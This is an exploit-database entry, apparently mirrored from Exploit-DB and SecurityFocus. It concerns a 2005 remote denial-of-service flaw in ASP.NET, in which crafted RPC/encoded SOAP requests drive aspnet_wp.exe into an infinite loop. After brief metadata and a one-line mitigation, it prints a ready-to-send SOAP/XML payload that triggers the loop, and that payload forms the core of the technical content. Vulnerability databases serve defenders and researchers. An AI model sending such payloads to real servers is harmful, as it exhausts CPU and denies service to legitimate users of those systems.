header-logo
Suggest Exploit
vendor:
ASP.NET
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: ASP.NET
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

ASP.NET Remote Denial of Service Vulnerability

ASP.NET is susceptible to a remote denial of service vulnerability. This issue is due to the possibility of causing an infinite loop on the server when handling RPC/encoded requests. By sending a specially crafted XML request, the 'aspnet_wp.exe' executable enters into an infinite loop, allowing remote attackers to consume excessive CPU resources, potentially denying service to legitimate users.

Mitigation:

Ensure that all RPC/encoded requests are properly validated before being processed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14217/info

ASP.NET is susceptible to a remote denial of service vulnerability. This issue is due to the possibility of causing an infinite loop on the server when handling RPC/encoded requests.

This issue presents itself when an RPC/encoded Web method accepts an array or object derived from 'IList'. By sending a specially crafted XML request, the 'aspnet_wp.exe' executable enters into an infinite loop.

Remote attackers may exploit this vulnerability to consume excessive CPU resources, potentially denying service to legitimate users. 


<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<tns:ArrayOfInt>
<Item>0</Item>
</tns:ArrayOfint>
</soap:Body>
</soap:Envelope>

Navigation

Suggest Exploit

Services By CQR